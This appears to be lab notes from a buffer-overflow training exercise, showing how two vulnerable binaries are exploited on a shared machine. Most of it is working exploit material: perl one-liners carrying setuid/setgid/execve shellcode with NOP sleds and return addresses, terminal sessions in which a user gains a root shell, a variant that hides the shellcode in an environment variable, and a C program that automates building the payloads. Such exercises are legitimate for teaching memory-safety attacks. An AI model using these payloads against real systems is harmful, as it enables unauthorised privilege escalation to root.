
Demo

Make sure the return address points at the shellcode as it sits in the command line (the argv[1] string, which lives higher up the stack), NOT at the copy the program makes into the overflowed buffer: that copy gets mangled, because once the shellcode runs its own pushes land just below the saved return address, i.e. on top of the tail of the buffer copy, and overwrite instructions that have not executed yet. Alternatively, pad the shellcode with 20 bytes at the end and shorten the starting NOP sled by the same amount so the total length stays the same; the pushes then land in the padding instead of in the code.

atl.HA95-mHA95:wwouts_smash:/smash $ id
uid=48350(atl.HA95) gid=9999(ATLAS) groups=9999(ATLAS)
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\x30\xcb\xff\xff"'`
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
sh-4.4# exit
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x75 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "X"x20 . "\x30\xcb\xff\xff"'`

DIY

export BLAA=`perl -e 'print "\x90"x213 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

gdb ./diy    (used to find the address of BLAA in the environment; that address is the return address written into foo.txt below)

atl.HA95-mHA95:wwouts_smash:/smash $ perl -e 'print "X"x250 . "" . "XXXX" . "\x24\xdc\xff\xff" . "CCCCDDDDEEEE\n";' >foo.txt
atl.HA95-mHA95:wwouts_smash:/smash $ cat foo.txt |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
The first run spawns the root shell but it exits at once because stdin is already at EOF; the extra cat keeps stdin open so commands can be typed into the spawned shell:
atl.HA95-mHA95:wwouts_smash:/smash $ (cat foo.txt;cat) |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
ls
demo  diy  foo.txt  setup.sh  shellcode.txt  shellcode2.txt
id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)


Test without the dodgy push EBX (the \x53 before the setgid int 0x80 is replaced with a NOP, \x90):

atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x90\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "BBBBCCCC"'`
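The C program below is an added example, not code from this repository. It rebuilds the two payload shapes used above (the argv payload for demo: NOP sled, shellcode, padding, return address; and the stdin payload for diy: filler, return address, trailer, with the shellcode living in an environment variable) and checks the constraints the perl one-liners silently rely on: the shellcode contains no NUL byte (a NUL would cut the argv string short), the total length stays at 136 bytes so the return address lands in the same slot whatever the sled/padding split, and the padding after the shellcode covers the stack the shellcode's own outstanding pushes consume (six pushes, 24 bytes, the first of which reuses the return-address slot, hence the 20 bytes). The shellcode bytes and lengths are taken from the sessions above; the 136-byte total is derived from them; the function names and the hard-coded return addresses are assumptions, and the addresses must be re-read from gdb on the target machine.

```c
/* Added example: payload builder for the demo/diy sessions (not the repo's code). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Shellcode from the README: setuid(0); setgid(0); execve("/bin//sh", {"/bin//sh", NULL}, NULL) */
static const unsigned char SHELLCODE[] = {
    0x6a,0x17,0x58,0x31,0xdb,0xcd,0x80,       /* push 0x17; pop eax; xor ebx,ebx; int 0x80   (setuid) */
    0x6a,0x2e,0x58,0x53,0xcd,0x80,            /* push 0x2e; pop eax; push ebx; int 0x80      (setgid) */
    0x31,0xd2,0x6a,0x0b,0x58,0x52,            /* xor edx,edx; push 0xb; pop eax; push edx             */
    0x68,0x2f,0x2f,0x73,0x68,                 /* push "//sh"                                          */
    0x68,0x2f,0x62,0x69,0x6e,                 /* push "/bin"                                          */
    0x89,0xe3,0x52,0x53,0x89,0xe1,0xcd,0x80   /* mov ebx,esp; push edx; push ebx; mov ecx,esp; int 0x80 */
};
#define SHELLCODE_LEN (sizeof SHELLCODE)      /* 37 bytes */

/* Pushes never popped by the time execve's int 0x80 runs: push ebx (setgid),
   push edx, push "//sh", push "/bin", push edx, push ebx.  After `ret`, esp
   points just above the saved return address, so the first push overwrites
   that slot and each further push lands 4 bytes lower, on the buffer copy. */
#define OUTSTANDING_PUSHES 6

/* Padding needed between shellcode end and return address so no push hits
   code that has not executed yet (the first push reuses the ret slot: -4). */
size_t pad_needed(int pushes) { return (size_t)pushes * 4 - 4; }

/* 1 if the bytes survive strcpy()/argv intact (no NUL terminator inside). */
int shellcode_is_nul_free(const unsigned char *sc, size_t len) {
    return memchr(sc, 0, len) == NULL;
}

static void put_le32(unsigned char *p, uint32_t v) {        /* little-endian, as x86 expects */
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Demo layout: [NOP sled][shellcode][pad x 'X'][ret], `total` bytes overall.
   Returns the sled length, or 0 if the pieces do not fit in `total`. */
size_t build_argv_payload(unsigned char *out, size_t total, size_t pad, uint32_t ret) {
    if (total < SHELLCODE_LEN + pad + 4) return 0;
    size_t sled = total - SHELLCODE_LEN - pad - 4;
    memset(out, 0x90, sled);
    memcpy(out + sled, SHELLCODE, SHELLCODE_LEN);
    memset(out + sled + SHELLCODE_LEN, 'X', pad);
    put_le32(out + total - 4, ret);
    return sled;
}

/* DIY layout: [filler x 'X'][ret][trailer]\n, shellcode lives in an env var
   (the README's BLAA) so nothing here executes from the buffer.  Returns length. */
size_t build_stdin_payload(unsigned char *out, size_t filler, uint32_t ret, const char *trailer) {
    memset(out, 'X', filler);
    put_le32(out + filler, ret);
    size_t n = filler + 4, tl = strlen(trailer);
    memcpy(out + n, trailer, tl);
    n += tl;
    out[n++] = '\n';
    return n;
}

/* Usage: ./mkpayload [pad] > payload.bin   or   ./demo "$(./mkpayload 20)"
   0xffffcb30 is the address from the README session, an assumption here;
   re-read it from gdb on the target. */
int main(int argc, char **argv) {
    size_t pad = argc > 1 ? (size_t)atoi(argv[1]) : 20;
    unsigned char buf[136];                    /* total derived from 91 + 37 + 4 + 4 */
    if (!shellcode_is_nul_free(SHELLCODE, SHELLCODE_LEN)) {
        fprintf(stderr, "shellcode contains a NUL; argv would truncate it\n");
        return 1;
    }
    size_t sled = build_argv_payload(buf, sizeof buf, pad, 0xffffcb30u);
    if (sled == 0) { fprintf(stderr, "payload does not fit in %zu bytes\n", sizeof buf); return 1; }
    if (pad < pad_needed(OUTSTANDING_PUSHES))
        fprintf(stderr, "warning: pad %zu < %zu needed; ret must then point at the argv copy\n",
                pad, pad_needed(OUTSTANDING_PUSHES));
    fwrite(buf, 1, sizeof buf, stdout);
    return 0;
}
```

With pad 4 the builder reproduces the first one-liner (91-byte sled) and warns, with pad 20 it reproduces the second (75-byte sled) without a warning; the warning is exactly the case where the return address has to target the command-line copy instead.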